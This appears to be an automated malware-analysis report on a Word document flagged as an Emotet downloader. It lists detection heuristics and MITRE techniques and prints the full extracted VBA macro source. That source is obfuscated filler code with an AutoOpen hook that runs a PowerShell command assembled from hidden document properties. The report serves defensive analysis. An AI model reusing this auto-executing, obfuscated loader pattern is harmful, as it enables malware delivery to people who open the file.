MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with a signature indicating it's an Emotet downloader. Heuristics confirm the presence of VBA macros, specifically an AutoOpen macro that utilizes the Shell() function to execute PowerShell. This strongly suggests the document's purpose is to download and execute a further stage of malware.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
On Error Resume Next VBA.Shell$ "" + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcww + gFSxPkkEk + PFETVNPNWdT + yhXMtYVRwmM + ADmXMHbLhRD + TLaXwSV + ActiveDocument.CustomDocumentProperties("sVUTrmdRcM") + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcww + gFSxPkkEk + PFETVNPNWdT + yhXMtYVRwmM + ADmXMHbLhRD + TLaXwSV + ActiveDocument.BuiltInDocumentProperties("Comments") + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcw … End Function -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() BtcNawFuYna -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13639 bytes |
SHA-256: 785c26dbaa5a7dcf4dbc137d22f19a8949eeedf16506ffd470d7dcec37e64146 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub oNXCI253n()
On Error Resume Next
Set Ntd = rHGTN
Do
SCoP0E0 = Rnd(8)
gTFS4ze1 = ucAiX8RT4 + vJXR * 47 - CDbl(CixUh2) + 85860524 + CSng(489878376 - CBool(5406) + 83 / Cos(7104)) + (145 + harrH3 - lgDT + Cos(91) * (xClRS916 - Rnd(1) / 6636 * Fix(GlMU3Ofv)))
For uciF4Lf = 6 To 890
FrUc = (1 / vKv / 435082536 - CLng(LdigP0) / (ijYX8f + CBool(22606395)))
Next
REuK9 = 316094851 / 22547177
For Each Ombqk9c9d In IwaS
CkHzp = Cos(271833541)
Next
For YAU = quW To dRmc7T
QRH = 98 - CBool(51 - CByte(1651) - NqgB - CBool(2 * Round(7310) - AJYgRj0 * 665)) / 343221840 * Tan(5914 / XqTL7rlw5) * 5181 - CDbl(88) + AzCC42 * CDbl(7691) * 169744011 / 1050
Next
Loop Until NPnU9 > gbtqyBC
End Sub
Sub aDiBxqR9()
On Error Resume Next
Select Case UmQs
Case 307494170
syjuem1 = Sqr(XqWh8Gfy * CInt(63903196) - QqDeQlI15 / 869)
WhXr = Cos(760)
Case 9
QYYN2 = Int(uxt + Round(DSXi3M))
fDLW1 = 2
End Select
Qeud976E2 = CTR * OmNN7o
For Each ePUaM In FqGL6
hmY = BAnYr213g + 166436589
Dim tYLS()
ReDim tYLS(2)
tYLS(0) = 678
tYLS(1) = 52
If qMh <> 17 Then
oxIS5 = 501
End If
MrhjS = 254 + Fix(JvWb90) + MAbg0 / Atn(NIdP - JMeIcAt / 428421522 * wdWl2g8o8) / (pLRu8 / CStr(488) / 3 + Sqr(CTRv220 - Fix(8) * 355 / Log(ZUvkXvG)))
Set MDVF = heZa555T3
Next
End Sub
Sub NStz5F7()
On Error Resume Next
While TgwW9aQ >= 66
While GqEtjg7q3 Eqv 8363
Qujn67 = Round(capffqGpu * usQ)
Wend
kwqd7 = (668 + dxZcycY56 + 3100 * Oct(mhYr4 - ChrW(HBevPHn5)) - RXQPn / SUZL)
Set ewto8 = rASG451
Wend
If lSTGb1 <= mgyJg44 Then
If xEpi > 6 Then
fmINgQW = 169
End If
Select Case GjTT77X
Case 350111050
QOshD07r = CByte(92)
xsBm165 = 289
Case 4130
BDBD6 = kKe
AzVD43 = Fix(zlGK - Hex(ENb))
End Select
Else
knHA51 = MGptR87 - KVbnbH
Set Ziu = YysF4BF4
End If
For Each DPSVUoxd In vCRSDT8X
RMe = XJoIKP3f1 + 253138988
Dim RpZ(6765, 182)
Do While WKQL1W <= utNR6907
dENDL6 = CLng(kxKG02Pi6 - TVdAr31u)
Loop
WfAO6 = 211759300 * SaRhy
xFoa5Ln = Tan(8)
For Each KFYb2Evt In podQ7SaX
OxIS5h6w2 = (9914 + Hex(pAw - Sqr(ZrLo * CDbl(vlWqW82))) / (SQpOzF / CByte(IswlC) - YeZG87WSn * 20 / kli - xesq129C5 * Qngp3o - iHeiJj5EZ * (599 * CDbl(354))))
Next
Next
End Sub
Sub AHFXb(nVxp7z)
On Error Resume Next
Do
Do
cxAY454 = ylud6TX76 * Fix(GRZe3eG) + KrjF - wuqh - 344077735 - Cos(1) - bfVeM5 * AANNV * 8907 + Oct(79)
Loop Until aywtka Or uJbu8b
Do While pAPq = uiA
kjGj9 = RcRpJ50W
Loop
Loop Until EQihK943H >= jdqM6u72h
If LTP And zDTs95jo Then
Do
ZVMaQ = gpVStZY + CDbl(5694 / Fix(2674)) + 969 / qtU / (29029482 / CInt(369170378) / IeS + PpQG * 2930 * NbJf9q4 * VuiP1d9o + QMxF5a)
Loop Until fwHu1 = MfPe
ynnq537 = 328571239 * 270959438
Else
Do
WZLdTk = (FEyKr32R9 + Sin(7)) / fRecn459 - 764 + QNH + 1 / AIB + CSng(179213886 - 177755595)
Loop Until qCna Or itsrF2r
Do While ZEMe6zyV5 Or pZx
cICK43472 = 6153
Loop
End If
For pLrj79 = 9845 To 16372676
Dim EKrr6()
ReDim EKrr6(2)
EKrr6(0) = 19
EKrr6(1) = 35586319
iAsG2A = NJeLEA5X7 - Elqw61O
DOX = sjdkP * 85 * bpTg125 + Chr(3 * Hex(6036) / jbBE3Qj9w - CStr(SrD)) * (41 / Sgn(14 / ChrW(hhwppnvc3) - 990 * Sqr(6 + CSng(2866 / Sin(XAAp) - 53 * 6244) - 253089492 - 164172741)) + 965 / Round(920))
itgW77838 = 13 * CInt(32 + 65847274) / nfbc * Atn(EhhIo) * 361 + CDate(ottEpp3)
KgMV = MTO * Int(7) * 63 - Sqr(1526) - WLSZ - Sgn(rofjh288s + Fix(Gjm + Hex(9237761) * 395 + Sqr(zgNVr0p37))) * 403723965 - Int(3437 - CDbl(8 + ChrW(471125614))) + (FHvH / 1 / Sda / Hex(578))
Set Jwv = YrxB364
Next
End Sub
Sub autoopen()
BtcNawFuYna
End Sub
Sub NwQw(JYgxS37)
On Error Resume Next
While ljwGPg8wj Or uPYU0uN
If zvTqj Or edOsi5x Then
SxslO9 = Rnd(450)
End If
For Each bBEh8g3l In zRJy90G
etfs41 = AQgc30O4 - CLng(30) * 304679274 + Log(ttTAp - 3 + 1191 / Hex(sIih))
Next
Do
Ukzcf866 = (XTel5J35 / Fix(5012 + Log(CFQE4I1) + 18 / Tan(ILfyCj35A)) / WkJGl641T - CDate(5064 - Hex(dzLpU4C) - jnmOWd7 / CDbl(613)) * (mvJ / Hex(mMqG8o05 - CInt(rfAx) / 7 + Oct(2)) - 1635 / CDbl(3) - 7759 + zdyhdCZ9))
Loop Until jIX And OIUH8
Select Case QGyrA
Case 47
fgFs01zh = UsoJ67H
oiQFz = 301
kuCGF36G4 = Oct(kdJM8)
Case 83
NbRxN = 961
HxEzWW = ChrB(9495)
OEvG36miW = PqAf7
Case 811
QUdY2N4F = CByte(84280187 / CLng(CzzV9wPE - ChrB(96)) * 528674950 + CSng(CwfUt))
taIlH7 = Oct(621)
SJsv3sG = ChrB(5476)
End Select
UkyDqv = 209138705 * 336955206
Wend
For Each KcPVoC26y In pYZDepkH2
For qBH = Byp To ItZu3NUzm
LZS = 64 / ChrB(501) - HtIo + Sgn(38) - (236614926 / 887)
Next
Do While WkN Eqv vdn
wbLN = (5 + xyMLBF6 / 799 * Tan(244952897) - (4340 / CDate(183612180) + DdFVK - 3 + RuL - Atn(4943 / CInt(267668729) - 95 / HcHl) - mqXU / Sin(53)))
Loop
Do
UmQvbQ1 = 9206 - 7 - TmNe4BS - ChrW(gkIE0D) + 9 / Tan(662 + fNcE2 / 2474 - Chr(ovk)) + hHlh / YHW - 25 * CBool(80 * 24411686) + 65 / Log(EMGc5 / Hex(Xqt) + bWRyjcr22 / 39) - QLEUc530z - Cos(IGIe5)
Loop Until HuSY75 > WMwNJ
Set OPQR9 = 36
While RHcJHE4 And 6
ZCTg80C2 = Sqr(8)
Wend
Next
If NaRU = 14 Then
If Yly < ban Then
LExA0nD = ChrW(sEL + Mjgg0)
End If
Do While XjkU21R Or 9
NyDM50 = Tan(355986079)
Loop
ElseIf Zqx >= Kusl3 Then
For IxuBJw10v = 116762295 To 238172867
IWsR = ChrW(535993604)
Next
For Each DKkWv In bCR
iOWM438X9 = AdJUWnK / MCWHBb3 - NgQTp5 / CInt(lRGi44XAU) + (47 - Atn(qUED / owcli88) * 4 - fDZn / 503 + Sqr(MKUJ - Sin(3151) - 430 + ChrB(INJ + Sin(rirp2l32 / Atn(466971471 * Atn(6987)) + 236 + Int(blD)) / rGoC43x9 * BQJd4K4KL)) - PpIa * Int(1239 / CInt(mMLU) + swBx6v75v + CInt(pcDCIV0ft / 507)))
Next
End If
End Sub
Sub XDY(jnYT8o)
On Error Resume Next
If ZoVK7526P >= KBMq90 Then
If zuSH Xor bKlpAYaN Then
zgLGuJP = 37114734
End If
mZkw16 = DgVs / BFZw8iWq - (3457 - EYav523 / 756 + CBool(64)) / HOBQ27C6 / 559 + gjFJiPXW0 / 8
Else
Do
ZRaIkfd4 = (8611 * CDbl(RkyB))
Loop Until qpMG8E577 And elmhJG0S
For Each xNuf In gILp528R7
wtUEk6p = 2064 - xBrhy / GuFUK + Oct(qPdml65) + LBCc4i + udB * 64 + XEVL71O
Next
End If
NQFB4 = 398996837 - LLBcsA
End Sub
Sub JSjM466o()
On Error Resume Next
QGSCe = 528590497 * 73959313
For gHcu6 = 402 To IBP
For Each KvxI1h9 In JFx
idIYU33R9 = Hex(DIbZ)
Next
While jfON <> RkJu0Y3
VQN = Chr(12)
Wend
Dim RrqF85(857)
Do
UawS44 = CDate(Mpmse8e)
Loop Until QVyL1vh9 <= 7
If pjrY Or WoeU301 Then
BrKpb8 = Int(3 / Int(wqSdqF) + SqkD52 / 104713059)
End If
For Each ZfZN8 In yuP
QJBYs695N = 283842145 - Sin(NzWI0291) * 8760 * CStr(5506) * 24 - CByte(6 - Cos(qoKW422j + 1873 * 394342793 + Cos(zpA - Chr(5140))))
Next
Next
End Sub
Sub TyrdRo7()
On Error Resume Next
Select Case WOmeVyG4
Case 11
mWYTk3 = CInt(LTjy64Q)
aKqp9803 = MSPD
qBdTg2 = CStr(rrdli6A - Hex(fQZ) * QfTe7uO2 - Chr(72))
Case 355
UNjK = Cos(86 - IKH)
UssQRI = Hex(68 / 940 + Uxzf * 63)
XBqp = Round(13765379)
Case 6
VTJPv3 = CDate(uQWG44K7 * Chr(9544))
URr = Round(4)
LfXSO2 = CByte(Wtno + Round(72 / Rnd(31)))
End Select
Set iROw4P9jP = ZcJ
End Sub
Public Function BtcNawFuYna()
On Error Resume Next
VBA.Shell$ "" + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcww + gFSxPkkEk + PFETVNPNWdT + yhXMtYVRwmM + ADmXMHbLhRD + TLaXwSV + ActiveDocument.CustomDocumentProperties("sVUTrmdRcM") + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcww + gFSxPkkEk + PFETVNPNWdT + yhXMtYVRwmM + ADmXMHbLhRD + TLaXwSV + ActiveDocument.BuiltInDocumentProperties("Comments") + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcww + gFSxPkkEk + PFETVNPNWdT + yhXMtYVRwmM + ADmXMHbLhRD + TLaXwSV + XndxnUNtPe, 0
End Function
Sub GNcB41(JcY)
On Error Resume Next
If IPox >= Pwbzk Then
Select Case YANq0
Case 368
RAPrzha = 47
xXa = Atn(332)
Case 2432
zxmf = eQm
faN = Int(4)
Case 352144935
ZyLb8C = Tan(DYDdFQ16)
bAWs = CSng(Rpevy)
End Select
Select Case dyIpR
Case 264
mgCC8 = ozhGwwP98
Trra = GqvO7740
fqpw6 = 70
Case 55
hyAh = CInt(297)
VrLLI50 = Chr(aWDPJ3PEY)
AHlgz8q7 = Tan(mXjSr * 470150377 + 36 + Cos(sMXjz3i))
Case 344054156
PwV = bvuHP
jbfdnRdq0 = GuwS3o1
qCjfw6 = Sgn(8935)
End Select
Else
vstu24xd = Atn(79)
XozA = 294175563 + qpNomFf1m
End If
For Each WKvwDt0 In SulI35
Set cWAC = tsK
Do
KGqx = pAYuy
Loop Until RvcJC Eqv XYk
For Each sLK In Bovu
OHHlt1C4H = yYoVokd4H * Atn(70 / Log(5 / 9 + IURT2QvCx / Cos(EHAJ / Chr(jgPB2R6I)))) + 407 / Sin(moib) / 978 + TEakQ327 / 170462501 / CStr(HMinY2oX) - qUX * Oct(6)
Next
If wtVr6666r >= mewpju09 Then
sZxY46 = CSng(QCBB)
End If
Next
End Sub
Sub TCNa(kfoJE9y3)
On Error Resume Next
While IJbB6M0VK < 46
While XXWO02Q1 = aTeVfQ
yvNK7328F = pBnQ08 - Oct(8442) / 7 - 832 + QNcgN39 + ChrB(8 - Sqr(ZuXW8 - 456 + 86 / JTch58) + 5605 * 90) * imlL7Fr - Round(1) / 8929 + 5 - oWlWEG - CDate(naXtH98tP) * (MpdW9 + Sin(72) - evQO8p - pBque7m)
Wend
uhE = CTtk - 195347364
alqq69 = (zCTWU8 / ChrB(icUH6x8) + 255 / Sqr(eaC) / HwYot4a2 + CByte(508894376) * 763 / Cos(6) / (172089548 + Chr(nTT)))
Select Case eMygYl3F7
Case 35
DucQ = gzhP31K
lRcd162 = CDbl(LrZmM121C)
fWEB331 = Sgn(8)
Case 47
WTgu03D35 = sNCH2hCvH
HQtH = rWEc13P2
gisnh1Po = CSng(CRelcZG6L)
End Select
Wend
For GhL = 5 To 23
If tmIQ1r And DFuO Then
Xxj = Sgn(274868601)
End If
Do While yHRW3 And dQrV
OCHr38s6 = WsdnvT / ChrW(RmB - 155715744 - 8 - 6755) / 4977 * Fix(80 - Cos(hHq + Chr(xRyS4) / UeQM7W3V / Sqr(82)) + CkAp4Kp6X - ChrB(6052 - CLng(87) / zKQk0 * Chr(19))) - 5425 / CByte(488214058) + AyRdoZ6 - 8761 + 77 + 6
Loop
qrOosSl = zfao96rN4 - GLzLm11zx
Next
End Sub
Sub Jbc(HCaW)
On Error Resume Next
Do
Set Hhdfd19 = 86
For Each MHIfhj In thPY44tm
ippb9 = (YDLP0OM * 7 / HiB + Rnd(6026 + CByte(3703)) - axYGtE9LO - Fix(363))
Next
Loop Until pPTN3y84a Eqv MCjD9o
For TvCwt6h86 = RlvU To 5984
Do While moNDB7 And oDhOL
saDkUu = edPG5boX - 6339 - 412237500 - Cos(fVUx9) - Qmaw / 9 + 455 - CByte(LRqb1B - Hex(6818 * Int(1802)) * 7 / Log(8)) * kXqw / CBool(71) * TIy * Rnd(ugNjkVe31)
Loop
If HZjR And xELQ95j63 Then
HGyJUe7 = 1
End If
Set kroW = 4047
While ZFfV3775 Xor XYiaZ8
hgkId3425 = 63
Wend
Next
While Hsmgi68 Or bWtr5
Select Case BcSM0C
Case 6
ZdKn06qW2 = CStr(47)
PesO3w = 3138
Case 6168
KgPa = AHwtbn4ld
DrYiJ = Rnd(NjYs030)
Case 782
zpM = rNRZ2
AeLM822 = CInt(3)
End Select
Dim Cuuh3rYPS(1778)
Do While HujtyY9 = 5
kOyyzC4 = 485377209
Loop
Do
URIRY = (lVZw + Chr(3169) / uulbuKpU - CBool(eYwe2) * CIMff / Round(1 / CStr(123550634 / CBool(cCJi41id) + 3621 * CByte(133457821)) - 42766565 + kka))
Loop Until yhmoT >= bxJt
tvvc0 = 522583508 / bTql
Wend
End Sub
Sub WqoDwzL51()
On Error Resume Next
While mWIxC5Q > 2
Set iHgu55hN = 673
While KZeMpP Xor sDsByK
Ffc = 27546976 - Sin(9525 / CLng(UPdNJqL) + 1 * CDbl(379481809)) / GVA * CDbl(55) * XLV - Sin(TDdUdL) + zDzBc * Rnd(emm) * IxxU6 + 1 / 3 * 7488 + gXmCqphG4 * eaVdYNAb
Wend
goav4gn = CStr(137455459)
Wend
Do While RtfRCR > REqgOnJL
CRFB4 = (16 / 390702212 - 494249700 * RTKu5Nj + 7 * VQqj6 + nxoX4Og0 * VNjPO7u - 18 + Int(ChZc2z) / meY + Atn(182))
Set lDC = fJZt5B
Loop
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.